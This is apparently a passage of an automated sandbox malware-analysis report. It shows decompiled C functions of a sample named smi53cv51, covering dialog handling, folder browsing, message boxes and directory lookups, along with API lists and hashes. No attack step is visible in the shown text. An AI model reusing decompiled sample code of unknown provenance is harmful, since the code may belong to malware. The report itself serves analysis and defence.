                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0xa691d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0xa6858c);
                                                                                                                                                                                                      						_t39 =  *0xa6879c; // 0x0
                                                                                                                                                                                                      						E00A63680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0xa6858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0xa6879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 00A63535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00A63541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 00A6355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(00A61140,00000000,00000020,00000004), ref: 00A63590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A635C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00A635F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00A635F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00A63610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00A63617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A63623
                                                                                                                                                                                                      • CreateThread.KERNEL32 ref: 00A63637
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A63671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: 10248e48ee0e245e9c0fa3b30a977adec7d593b747ed45e40a29869f06dab5b0
                                                                                                                                                                                                      • Instruction ID: 6e9055b9d29edbb78e7ab49e6c6e1df82cee30db2ac884a68c8e809ca2807eb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10248e48ee0e245e9c0fa3b30a977adec7d593b747ed45e40a29869f06dab5b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231B376240300BBDF219FB5EC4DE2B3A79E796B01F104619F613A62B0CBB58903CE51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E00A64224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E00A644B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0xa688c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0xa687a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0xa68598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E00A64200;
                                                                                                                                                                                                      					_v28 = 0xa688c0;
                                                                                                                                                                                                      					 *0xa6a288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0xa6a288(_t32, 0xa688c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0xa688c0 != 0) {
                                                                                                                                                                                                      							E00A61680(0xa687a0, 0x104, 0xa688c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa6a288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0xa687a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0xa688c0);
                                                                                                                                                                                                      					_t61 = 0xa688c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0xa688c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0xa688c0; // 0x14d1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0xa688c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xa688c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A64236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A6424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A64263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A6427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00A688C0,?,00000001), ref: 00A6429F
                                                                                                                                                                                                      • CharPrevA.USER32(00A688C0,014D1181,?,00000001), ref: 00A642C2
                                                                                                                                                                                                      • CharPrevA.USER32(00A688C0,00000000,?,00000001), ref: 00A642D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A64391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A643A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: 23d1f8eef74d7b376a5f3cb803c60423c84101cb9eba078a1e68dbecd567add8
                                                                                                                                                                                                      • Instruction ID: 21ed62255e3527023d60f6e6b48921aebdfc7ea71d688c58900c22bbef50c2ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23d1f8eef74d7b376a5f3cb803c60423c84101cb9eba078a1e68dbecd567add8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21411CB4A00304AFD711EFB4DC949AE7BB8FB59384F140669E941A7351CFB88C42CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0xa68a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xa69a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E00A61680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A6171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E00A6171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E00A6681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E00A667C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16);
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(E00A6681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E00A667C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x00a64628
                                                                                                                                                                                                      0x00a645cd
                                                                                                                                                                                                      0x00a645cd
                                                                                                                                                                                                      0x00a645cf
                                                                                                                                                                                                      0x00a645cf
                                                                                                                                                                                                      0x00a645d2
                                                                                                                                                                                                      0x00a645d2
                                                                                                                                                                                                      0x00a645d4
                                                                                                                                                                                                      0x00a645d5
                                                                                                                                                                                                      0x00a645db
                                                                                                                                                                                                      0x00a645de
                                                                                                                                                                                                      0x00a645e3
                                                                                                                                                                                                      0x00a645e9
                                                                                                                                                                                                      0x00a645ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a645f3
                                                                                                                                                                                                      0x00a645fd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64602
                                                                                                                                                                                                      0x00a645ed
                                                                                                                                                                                                      0x00a6457e
                                                                                                                                                                                                      0x00a6457e
                                                                                                                                                                                                      0x00a64580
                                                                                                                                                                                                      0x00a64580
                                                                                                                                                                                                      0x00a64583
                                                                                                                                                                                                      0x00a64583
                                                                                                                                                                                                      0x00a64585
                                                                                                                                                                                                      0x00a64586
                                                                                                                                                                                                      0x00a6458a
                                                                                                                                                                                                      0x00a6458c
                                                                                                                                                                                                      0x00a6458f
                                                                                                                                                                                                      0x00a6458f
                                                                                                                                                                                                      0x00a64591
                                                                                                                                                                                                      0x00a64592
                                                                                                                                                                                                      0x00a6459b
                                                                                                                                                                                                      0x00a6459e
                                                                                                                                                                                                      0x00a645a3
                                                                                                                                                                                                      0x00a645a9
                                                                                                                                                                                                      0x00a645ad
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a645af
                                                                                                                                                                                                      0x00a645af
                                                                                                                                                                                                      0x00a645bf
                                                                                                                                                                                                      0x00a6462d
                                                                                                                                                                                                      0x00a64630
                                                                                                                                                                                                      0x00a6463d
                                                                                                                                                                                                      0x00a6464e
                                                                                                                                                                                                      0x00a6464e
                                                                                                                                                                                                      0x00a6463f
                                                                                                                                                                                                      0x00a64640
                                                                                                                                                                                                      0x00a64647
                                                                                                                                                                                                      0x00a6464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6464c
                                                                                                                                                                                                      0x00a64666
                                                                                                                                                                                                      0x00a6466d
                                                                                                                                                                                                      0x00a6466f
                                                                                                                                                                                                      0x00a64675
                                                                                                                                                                                                      0x00a64675
                                                                                                                                                                                                      0x00a645ad
                                                                                                                                                                                                      0x00a64527
                                                                                                                                                                                                      0x00a6452e
                                                                                                                                                                                                      0x00a6453f
                                                                                                                                                                                                      0x00a6453f
                                                                                                                                                                                                      0x00a64530
                                                                                                                                                                                                      0x00a64531
                                                                                                                                                                                                      0x00a64538
                                                                                                                                                                                                      0x00a6453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6453d
                                                                                                                                                                                                      0x00a64554
                                                                                                                                                                                                      0x00a6455a
                                                                                                                                                                                                      0x00a6455a
                                                                                                                                                                                                      0x00a6455a
                                                                                                                                                                                                      0x00a64525
                                                                                                                                                                                                      0x00a6468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A645A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A645E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A6460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00A64630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00A64666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00A6466F
                                                                                                                                                                                                        • Part of subcall function 00A6681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A6686E
                                                                                                                                                                                                        • Part of subcall function 00A6681F: GetSystemMetrics.USER32(0000004A), ref: 00A668A7
                                                                                                                                                                                                        • Part of subcall function 00A6681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A668CC
                                                                                                                                                                                                        • Part of subcall function 00A6681F: RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,?,0000000C), ref: 00A668F4
                                                                                                                                                                                                        • Part of subcall function 00A6681F: RegCloseKey.ADVAPI32(?), ref: 00A66902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: ef5f16ef21767b3c124bd66afc889a51821eccae808810a1691b40e2751865a5
                                                                                                                                                                                                      • Instruction ID: 2551e117f4dc7bcd3463d3370ffea91a8fb40a0f39e0f37c0d67a46b40458b43
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef5f16ef21767b3c124bd66afc889a51821eccae808810a1691b40e2751865a5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E951F676900219AFDB21DF68CC48BAA7B79EF5A304F144194FD1AB7241DB71DD06CBA0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A62773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E00A61781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E00A6658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E00A6658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0xa61140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
